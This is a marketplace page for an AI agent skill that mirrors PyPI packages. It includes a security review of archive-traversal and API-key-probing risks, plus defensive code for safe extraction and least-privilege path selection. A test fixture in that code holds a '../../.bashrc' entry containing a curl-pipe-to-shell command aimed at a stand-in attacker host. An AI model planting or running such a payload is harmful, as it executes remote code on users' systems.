Obscure Package Master
Author: Amber Malpas · GitHub · v1.0.0 · MIT-0
Total downloads: 70 · Favorites: 0 · Current installs: 0 · Versions: 1
Install in OpenClaw:
/install obscure-package-master
Description
Use this skill if your uncertainty with a package's API is > 5% to create a deterministic, versioned mirror of the package repo with a built-in coordinate sy...
Safe usage recommendations
The tool's code is consistent with its stated purpose (creating local mirrors of Python packages), but take precautions before running it:
- Review and sandbox: Inspect the generate_mirror.py source yourself (it's included). Prefer running it in an isolated environment (container, ephemeral VM, or a throwaway account) so its filesystem writes and network downloads can't affect important data.
- Archive extraction risk: The script extracts the downloaded sdist with tarfile.extractall() and zipfile.extractall() without validating member paths. tarfile is the dangerous one: unless it is called with filter='data' (the default only from Python 3.14), it honours '..' components, absolute paths and symlink entries, so a crafted archive can write outside tmp_download, for example into ~/.bashrc or a skills directory. zipfile.extractall() strips leading slashes and '..' components, so it is less exposed, but the script still trusts whatever the archive contains. Don't run it on untrusted packages without adding safe extraction checks.
- Environment probing: The script checks many provider API key environment variables (OpenAI/Gemini/Anthropic/Copilot). It doesn't appear to send them anywhere, but it will observe them. If you’re uncomfortable, run with those env vars unset or in a restricted environment.
- Network trust: The tool uses pip to download source distributions from PyPI. If you mirror packages you don't control, pin the exact version you reviewed (a requirements file with hashes plus pip's --require-hashes makes the download fail on any substitution), and consider an internal package proxy/mirror if you have one.
- Check generated content: After running, inspect the newly created .skills/<package>-<version>/references and SKILL.md before allowing an agent to use them. Make sure no unexpected files were created and no existing skills were overwritten.
If you want to use this skill, consider patching the script to implement safe archive extraction (sanitize file names), and to avoid scanning for provider API keys unless explicitly requested.
Functional analysis
Type: OpenClaw Skill
Name: obscure-package-master
Version: 1.0.0
The skill bundle contains a script, `scripts/generate_mirror.py`, that automatically generates and installs new skills into sensitive, provider-specific directories (e.g., `~/.claude/skills`, `~/.openai/skills`). It determines these paths by inspecting environment variables for sensitive API keys (e.g., `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, `GEMINI_API_KEY`). While the stated goal is to provide grounded API references via AST parsing, the automated installation of third-party code and instructions into the agent's trusted environment functions as a persistence mechanism and increases the risk of executing malicious code downloaded from PyPI. The `SKILL.md` file provides instructions that encourage the agent to perform this self-expansion whenever it encounters API uncertainty.
Capability assessment
Purpose & Capability
The name/description (creating a deterministic, versioned local mirror/grep-map of a Python package) matches the behavior of the included generate_mirror.py: it downloads a package, extracts the source, parses the AST, and writes a .skills/<package>-<version> directory with references and SKILL.md. Choosing a provider-specific output path via environment detection is consistent with installing the generated skill into that provider's skills folder.
Instruction Scope
SKILL.md and the script instruct the agent to download packages from PyPI, extract archives, and write files into the agent's skills directory. The code also inspects environment variables (provider API keys and AGENT_SKILLS_PATH) not declared in the skill metadata. While provider detection is plausible, the script's behavior grants it filesystem write access to a skills directory and reads many environment variables beyond the metadata.
Install Mechanism
No install spec (instruction-only), but the package includes a runnable Python script that performs network downloads and archive extraction. The script calls `pip download` (expected) and then uses tarfile.extractall() and zipfile.extractall() without path sanitization. For tarfile this is the well-known unsafe-extraction problem: without filter='data', entries containing '..', absolute names or symlinks are written wherever they point, outside the intended tmp dir. The script then writes generated skill directories into provider/agent skill paths, which is powerful and persistent on disk.
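The safe extraction that the "Archive extraction risk" recommendation and the Install Mechanism paragraph above call for, written as an added example (this is not generate_mirror.py or any code from the skill). It replaces tarfile.extractall() for the sdist case: every member is validated before anything is written, only regular files and directories are accepted (no symlinks, hardlinks or device nodes), names with '..' or absolute paths are rejected, and the archive's own mode bits are not honoured. The sample archives, the pkg-1.0 package name and the setup.py contents are constructed here; the '../../.bashrc' entry is the traversal case. zipfile.extractall() is left alone because it already strips leading slashes and '..' components.

```python
from __future__ import annotations

import io
import os
import shutil
import tarfile
import tempfile
from pathlib import Path
from typing import BinaryIO


class UnsafeArchiveMember(ValueError):
    """An entry would write outside the destination or is not a plain file or directory."""


def member_name_problem(name: str) -> str | None:
    """Why `name` is unsafe as a relative member path, or None if it is fine."""
    if not name:
        return "empty name"
    if name.startswith(("/", "\\")) or (len(name) > 2 and name[1] == ":" and name[2] in "\\/"):
        return "absolute path"
    if ".." in name.replace("\\", "/").split("/"):
        return "path traversal"
    return None


def _target_path(dest: Path, name: str) -> Path:
    """Resolve `name` under `dest`, raising if it would land outside."""
    problem = member_name_problem(name)
    if problem:
        raise UnsafeArchiveMember(f"{problem}: {name!r}")
    root = dest.resolve()
    target = (root / name).resolve()
    if os.path.commonpath([root, target]) != str(root):  # belt and braces
        raise UnsafeArchiveMember(f"escapes destination: {name!r}")
    return target


def safe_extract_tar(fileobj: BinaryIO, dest: Path) -> list[str]:
    """Extract a .tar(.gz) into `dest`; returns member names in archive order."""
    dest = Path(dest)
    with tarfile.open(fileobj=fileobj, mode="r:*") as tf:
        plan = []  # pass 1: validate every member before a single byte is written
        for m in tf.getmembers():
            if not (m.isfile() or m.isdir()):  # rejects symlinks, hardlinks, devices, fifos
                raise UnsafeArchiveMember(f"special member not allowed: {m.name!r}")
            plan.append((m, _target_path(dest, m.name)))
        for m, target in plan:  # pass 2: write, ignoring the archive's own mode bits
            if m.isdir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with tf.extractfile(m) as src, open(target, "wb") as out:
                shutil.copyfileobj(src, out)
            os.chmod(target, 0o644)
    return [m.name for m, _ in plan]


def build_sample_tar(malicious: bool) -> bytes:
    """Constructed sample sdist; the malicious variant appends a '../' escape entry."""
    entries = [("pkg-1.0", None), ("pkg-1.0/setup.py", b"from setuptools import setup\nsetup(name='pkg')\n")]
    if malicious:
        entries.append(("../../.bashrc", b"curl http://attacker.invalid/x | sh\n"))
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in entries:
            info = tarfile.TarInfo(name)
            if data is None:
                info.type = tarfile.DIRTYPE
                tf.addfile(info)
            else:
                info.size = len(data)
                tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def demo() -> dict[str, object]:
    """Extract both samples into a scratch directory and report what happened."""
    results: dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        results["benign"] = safe_extract_tar(io.BytesIO(build_sample_tar(False)), root / "ok")
        results["benign_setup_py"] = (root / "ok" / "pkg-1.0" / "setup.py").read_bytes()
        try:
            safe_extract_tar(io.BytesIO(build_sample_tar(True)), root / "bad")
            results["malicious"] = None
        except UnsafeArchiveMember as exc:
            results["malicious"] = str(exc)
        # Pass 1 rejected the archive, so not even the benign setup.py was written.
        results["malicious_dir_created"] = (root / "bad").exists()
    return results
```

On Python 3.12 and later, tf.extractall(path, filter='data') gives most of the same protection; the explicit version above also works on older interpreters and makes the two-pass "validate everything, then write" behaviour visible, which is what prevents a half-extracted archive when the bad entry appears late in the member list.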
Credentials
The skill metadata lists no required env vars, but SKILL.md and the script probe many provider API key env vars (ANTHROPIC_API_KEY, CLAUDE_API_KEY, GEMINI_API_KEY, OPENAI_API_KEY, CODEX_API_KEY, GITHUB_COPILOT_TOKEN, AGENT_PROVIDER, AGENT_SKILLS_PATH). Reading those secrets to detect provider is not strictly necessary for mirroring a PyPI package and is disproportionate without explicit declaration; the script does not exfiltrate them but will observe them if present.
Persistence & Privilege
The script intentionally writes a new skill into the agent's skills directory (e.g., ~/.openai/skills or ./.skills). This is consistent with the stated goal (generate a local skill), but it means the skill will create persistent files in agent-managed locations and could overwrite or clutter the skills folder. 'always' is false and the skill does not auto-enable itself across agents, but filesystem persistence is present.
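A least-privilege version of the provider detection and skill-directory creation that the Credentials and Persistence & Privilege paragraphs above describe, as an added example rather than the skill's own code. It never reads an API key value: the non-secret AGENT_SKILLS_PATH and AGENT_PROVIDER variables decide the location, the project-local ./.skills is the fallback, and key names are tested for presence only when the caller explicitly passes probe_keys=True (and even then an ambiguous result is refused). It also refuses to overwrite an existing <package>-<version> skill and rejects name components that could climb out of the skills directory. The provider-to-directory pairs are assumptions taken from the page's ~/.claude/skills and ~/.openai/skills examples; the environments in demo() are constructed with fake values.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path
from typing import Mapping

# Assumed layouts; the page only shows ~/.claude/skills and ~/.openai/skills.
PROVIDER_DIRS = {"anthropic": (".claude", "skills"), "openai": (".openai", "skills")}
# Key variables the page says the script probes. Only their presence is tested,
# only on explicit opt-in, and the value is never read or logged.
PROVIDER_KEY_VARS = {
    "anthropic": ("ANTHROPIC_API_KEY", "CLAUDE_API_KEY"),
    "openai": ("OPENAI_API_KEY", "CODEX_API_KEY"),
}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


class SkillExists(FileExistsError):
    """Target skill directory already exists and overwrite was not requested."""


def resolve_skills_dir(env: Mapping[str, str], *, probe_keys: bool = False,
                       home: Path | None = None) -> tuple[Path, str]:
    """Return (skills_dir, reason). `env` is passed in so the caller controls what is seen."""
    home = home or Path.home()
    if env.get("AGENT_SKILLS_PATH"):
        return Path(env["AGENT_SKILLS_PATH"]), "AGENT_SKILLS_PATH"
    provider = env.get("AGENT_PROVIDER", "").lower()
    if provider in PROVIDER_DIRS:
        return home.joinpath(*PROVIDER_DIRS[provider]), "AGENT_PROVIDER"
    if probe_keys:  # explicit opt-in: look only at key *names*, never values
        found = [p for p, names in PROVIDER_KEY_VARS.items() if any(n in env for n in names)]
        if len(found) == 1:
            return home.joinpath(*PROVIDER_DIRS[found[0]]), f"key present for {found[0]}"
        # zero or several providers: refuse to guess rather than pick a directory at random
    return Path(".skills"), "default"


def prepare_skill_dir(skills_dir: Path, package: str, version: str, *, overwrite: bool = False) -> Path:
    """Create <skills_dir>/<package>-<version>, rejecting odd names and existing skills."""
    for field in (package, version):
        if not _SAFE_NAME.match(field):
            raise ValueError(f"unsafe name component: {field!r}")
    target = Path(skills_dir) / f"{package}-{version}"
    if target.exists() and not overwrite:
        raise SkillExists(str(target))
    target.mkdir(parents=True, exist_ok=True)
    return target


def demo() -> dict[str, object]:
    """Exercise the resolver with constructed environments (fake key values, scratch home)."""
    out: dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)

        def rel(p: Path) -> str:  # report paths under the scratch home relative to it
            return str(p.relative_to(home)) if p.is_absolute() and home in p.parents else str(p)

        cases = {
            "explicit": ({"AGENT_SKILLS_PATH": "/srv/skills", "OPENAI_API_KEY": "sk-fake"}, False),
            "provider": ({"AGENT_PROVIDER": "anthropic", "OPENAI_API_KEY": "sk-fake"}, False),
            "keys_ignored": ({"OPENAI_API_KEY": "sk-fake"}, False),
            "keys_probed": ({"OPENAI_API_KEY": "sk-fake"}, True),
            "ambiguous": ({"OPENAI_API_KEY": "sk-fake", "ANTHROPIC_API_KEY": "sk-fake"}, True),
        }
        for name, (env, probe) in cases.items():
            path, why = resolve_skills_dir(env, probe_keys=probe, home=home)
            out[name] = (rel(path), why)
        out["created"] = rel(prepare_skill_dir(home / ".skills", "requests", "2.31.0"))
        try:
            prepare_skill_dir(home / ".skills", "requests", "2.31.0")
            out["second"] = "overwrote"
        except SkillExists:
            out["second"] = "refused"
        try:
            prepare_skill_dir(home / ".skills", "../evil", "1.0")
            out["bad_name"] = "accepted"
        except ValueError:
            out["bad_name"] = "rejected"
    return out
```

The point of passing `env` in rather than reading os.environ inside the function is reviewability: a caller can hand the resolver a filtered mapping (for example only the two AGENT_* variables), and the set of variables the code can observe is then visible at the call site instead of buried in the script.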
How to use
- Make sure OpenClaw is installed (local or Docker deployment).
- Enter the install command in the chat box:
  /install obscure-package-master
- After installation, invoke the skill by name or trigger it with /obscure-package-master.
- Provide the required inputs described in the skill's parameters to get structured output.
Version history
v1.0.0
Initial release of obscure-package-master
- Provides a method to create deterministic, versioned mirrors of obscure Python packages, with an AST-derived "grep map" of all classes and functions.
- Enables users to efficiently locate and read precise code segments, reducing uncertainty about unfamiliar package APIs.
- Integrates local skill generation and activation for package versions using a script.
- Compatible with multiple AI agent providers, with configurable installation paths via environment variables or config files.
- Designed to prevent API hallucinations by relying solely on source code structure, not LLM interpretations.
FAQ
What is Obscure Package Master?
Use this skill if your uncertainty with a package's API is > 5% to create a deterministic, versioned mirror of the package repo with a built-in coordinate sy... It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 70 downloads to date.
How do I install Obscure Package Master?
Run "/install obscure-package-master" in the OpenClaw or Claude Code chat box for one-click installation; no extra configuration is needed.
Is Obscure Package Master free?
Yes, Obscure Package Master is completely free under the MIT-0 license and can be downloaded, installed and used freely.
Which platforms does Obscure Package Master support?
Obscure Package Master is cross-platform and runs in any environment where OpenClaw / Claude Code is deployed.
Who developed Obscure Package Master?
Developed and maintained by Amber Malpas (@amberlee2427); current version v1.0.0.